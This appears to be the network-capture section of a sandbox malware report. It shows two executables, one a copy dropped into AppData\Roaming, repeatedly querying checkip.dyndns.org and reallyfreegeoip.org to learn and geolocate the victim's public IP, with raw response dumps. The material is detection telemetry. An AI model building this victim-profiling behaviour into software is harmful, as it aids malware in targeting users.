Dec 16, 2024 14:23:12.794301033 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 16, 2024 14:23:13.168008089 CET	321	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:23:12 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b486aebf0cd315f56280d1c8151f8125 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 16, 2024 14:23:14.911082983 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 16, 2024 14:23:15.294223070 CET	321	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:23:15 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: fae8d63e15b8b493caba4b04fafcb50e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49742	158.101.44.242	80	8124	C:\Users\user\Desktop\FT876567090.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 14:23:14.013988018 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 16, 2024 14:23:15.219450951 CET	321	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:23:15 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 0e382693e7e794d87e6ac5ad3030ceaf Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49755	158.101.44.242	80	8124	C:\Users\user\Desktop\FT876567090.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 14:23:17.009506941 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 16, 2024 14:23:18.224162102 CET	321	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:23:18 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 4393e09b753a59b9d44cdd51a4f5f948 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49756	158.101.44.242	80	3704	C:\Users\user\AppData\Roaming\EYDNKhhJr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 14:23:17.110789061 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 16, 2024 14:23:18.320864916 CET	321	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:23:18 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 6b0c0082644d4d2eae71597740ecf228 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49766	158.101.44.242	80	8124	C:\Users\user\Desktop\FT876567090.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 14:23:20.040308952 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 16, 2024 14:23:21.243686914 CET	321	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:23:21 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e4c00712b40c900c4235775143214d5b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49767	158.101.44.242	80	3704	C:\Users\user\AppData\Roaming\EYDNKhhJr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 14:23:20.109385014 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 16, 2024 14:23:21.314349890 CET	321	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:23:21 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 76f6567e806c054b66f789dd58c84ed6 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49775	158.101.44.242	80	8124	C:\Users\user\Desktop\FT876567090.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 14:23:23.040644884 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 16, 2024 14:23:24.244319916 CET	321	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:23:24 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: aad3e98d9786a9f80c8d6e3a6e6d3b5d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49776	158.101.44.242	80	3704	C:\Users\user\AppData\Roaming\EYDNKhhJr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 14:23:23.111809015 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 16, 2024 14:23:24.319961071 CET	321	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:23:24 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 603173f6b3ffe9fc968f9adce33f9070 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49788	158.101.44.242	80	8124	C:\Users\user\Desktop\FT876567090.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 14:23:26.047564030 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 16, 2024 14:23:27.252557039 CET	321	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:23:27 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 1683d11dcd8e49ccda8827e135aeab99 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49789	158.101.44.242	80	3704	C:\Users\user\AppData\Roaming\EYDNKhhJr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 14:23:26.105798006 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 16, 2024 14:23:27.310658932 CET	321	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:23:27 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 6e54dadaa999c3ec730d7565f7d35c99 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49797	158.101.44.242	80	8124	C:\Users\user\Desktop\FT876567090.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 14:23:29.046560049 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 16, 2024 14:23:30.251179934 CET	321	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:23:30 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: f105daa1adeb7ee530a3b2c04c7b692a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49798	158.101.44.242	80	3704	C:\Users\user\AppData\Roaming\EYDNKhhJr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 14:23:29.105341911 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 16, 2024 14:23:30.507512093 CET	321	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:23:30 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: cc9a9bfe73a8d735b75705ab16fdd23a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49807	158.101.44.242	80	8124	C:\Users\user\Desktop\FT876567090.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 14:23:32.045152903 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 16, 2024 14:23:33.250650883 CET	321	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:23:33 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e25ae35d1e8922d42e92196f1da5c40f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	49811	158.101.44.242	80	3704	C:\Users\user\AppData\Roaming\EYDNKhhJr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 14:23:32.314729929 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 16, 2024 14:23:33.520648956 CET	321	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:23:33 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 0a6c7eaf9f5e5205a68a2978965b61c2 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	49821	158.101.44.242	80	3704	C:\Users\user\AppData\Roaming\EYDNKhhJr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 16, 2024 14:23:35.314642906 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 16, 2024 14:23:36.532517910 CET	321	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:23:36 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2e48ab39a925b508a60bc5d31c7664b9 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49730	104.21.67.152	443	8124	C:\Users\user\Desktop\FT876567090.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:23:11 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-16 13:23:11 UTC	882	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:23:11 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 344160 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tPTGBuLQwLiXE%2F5bSLOa%2FFe%2Fki26EAgft9yiHB17fp%2FAVdHKyTenXVMreOON8SJystEddui8n2KInDKT2v%2BLHaInrDn4TvC5ZmrerY2k09%2FvEmnUbqYkW2ZDHoUuFkScqOLlwHCh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2efc8dca45c35a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1537&min_rtt=1533&rtt_var=583&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1865814&cwnd=247&unsent_bytes=0&cid=b7dd99fdfca64438&ts=515&x=0"
2024-12-16 13:23:11 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49733	104.21.67.152	443	8124	C:\Users\user\Desktop\FT876567090.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:23:13 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-16 13:23:13 UTC	878	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:23:13 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 344162 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g%2BHB%2B0Q4AfPblkPdPqTaZraoJ7Iy3EUriUzWDMZcuT6TopyBsbWnwRsPiLaTATVI3GVmDQ0vwYpjz%2BNwmQ7VvrKng%2Bf2etGWDl4YlsUEcxt0BqVOrqzU9FwIpv2tuAeWpS8N05sD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2efc9acef55e71-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1994&min_rtt=1801&rtt_var=813&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1621321&cwnd=238&unsent_bytes=0&cid=6ddbf0448507d0ae&ts=456&x=0"
2024-12-16 13:23:13 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49741	104.21.67.152	443	3704	C:\Users\user\AppData\Roaming\EYDNKhhJr.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:23:14 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-16 13:23:14 UTC	878	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 13:23:14 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 344163 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LRVqHLwfg6Oe3gAv5UHC4q2sYczsX5acONw033daxqKoRZgUUz1QBujm02Zcd7e%2B9cflv3ZKMWv4eXBEMb%2Fo1a%2BkK4yh36JpskDHc2xWh%2BQ9Esamr3JsNdILZkynTEEKaj3ojhuX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2efca10b8642c3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1576&min_rtt=1531&rtt_var=664&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1542525&cwnd=203&unsent_bytes=0&cid=0486e8b820c27126&ts=455&x=0"
2024-12-16 13:23:14 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United 